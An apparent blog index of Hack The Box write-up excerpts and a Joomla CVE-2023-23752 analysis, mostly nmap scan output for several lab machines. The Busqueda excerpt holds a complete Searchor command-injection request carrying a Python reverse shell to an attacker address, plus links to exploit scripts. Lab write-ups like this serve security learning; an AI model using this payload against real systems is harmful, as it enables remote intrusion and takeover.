Crafty

- 4 mins read
author: sysevil OS: Windows Difficulty: Easy ip: 10.10.11.249 Port Scan nmap -p- -T4 --min-rate=10000 10.10.11.249 -oG open_ports_full Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:34 -03 Nmap scan report for 10.10.11.249 (10.10.11.249) Host is up (0.13s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 25565/tcp open minecraft Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds nmap -sV -sC -A -p 80,25565 -T4 --min-rate=1000 10.

Analysis of Joomla CVE-2023-23752

- 4 mins read
The Proof of Concept (PoC) for CVE-2023-23752 is available here. Overview CVE-2023-23752 represents a vulnerability in Joomla’s microservice API service, disclosed on February 13, 2023. Discovered by Zewei Zhang from NSFOCUS TIANJI Lab, the vulnerability has been assigned a base score of 5.3 (Medium). It allows unauthorized disclosure of plaintext passwords and Personally Identifiable Information (PII) of users. This article provides an analysis of the vulnerability. The Vulnerability CVE-2023-23752 is characterized by an improper access control flaw that permits unauthorized access to webservice endpoints without authentication.

Twomillion

- 5 mins read
author: sysevil OS: Linux Difficulty: Easy Port Scanner sudo nmap -p- -v -oG fullscan -T4 10.10.11.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:19 -03 Initiating Ping Scan at 18:19 Scanning 10.10.11.221 [4 ports] Completed Ping Scan at 18:19, 0.15s elapsed (1 total hosts) Initiating SYN Stealth Scan at 18:19 Scanning 2million.htb (10.10.11.221) [65535 ports] Discovered open port 80/tcp on 10.10.11.221 Discovered open port 22/tcp on 10.10.11.221 SYN Stealth Scan Timing: About 22.

Devvortex

- 3 mins read
#joomla IP: 10.10.11.242 OS: Linux PortScanner nmap --min-rate 1000 -sV -sC -p- -oG fullscan 10.10.11.242 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 09:41 -03 Nmap scan report for 10.10.11.242 (10.10.11.242) Host is up (0.21s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.

Busqueda

- 2 mins read
#searcho OS: Linux | Easy ip: 10.10.11.208 Web: - Werkzeug/2.1.2 Python/3.10.6 - Flask Python - Framework ? Searchor 2.4.0 Exploits: - https://raw.githubusercontent.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/main/exploit.sh ( searchor 2.4.0) - Exploit: https://github.com/jonnyzar/POC-Searchor-2.4.2 Reverse shell with searcho-exploit Exploit payload request: POST /search HTTP/1.1 Host: searcher.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 283 Origin: http://searcher.htb Connection: close Referer: http://searcher.htb/search Upgrade-Insecure-Requests: 1 engine=Amazon&query='%20,%20exec("import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.11',80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#&auto_redirect=10.10.14.11 Attacker machine Upgrade shell to TTY shell python3 -c 'import pty; pty.

Builder

- 5 mins read
IP: 10.10.11.10 OS: Linux Difficulty: Medium Port Scanner sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.10 -oG full_scan [sudo] password for parallels: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 20:17 -03 Nmap scan report for 10.10.11.10 (10.10.11.10) Host is up (0.13s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Jetty 10.

Bizness

- 3 mins read
#obfiz IP: 10.10.11.252 Port Scan sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.252 -oG full_scan [sudo] password for parallels: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 18:25 -03 Warning: 10.10.11.252 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.11.252 (10.10.11.252) Host is up (0.13s latency). Not shown: 65290 closed tcp ports (reset), 241 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.

Steamcloud

- 2 mins read
Machine: Linux Difficulty: Easy #Kubernetes #cloud IP: 10.10.14.149 PortScanner Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 08:33 -03 Nmap scan report for 10.10.11.133 (10.10.11.133) Host is up (0.13s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 2379/tcp open ssl/etcd-client? 2380/tcp open ssl/etcd-server? 8443/tcp open ssl/https-alt 10249/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) DirScanner _|.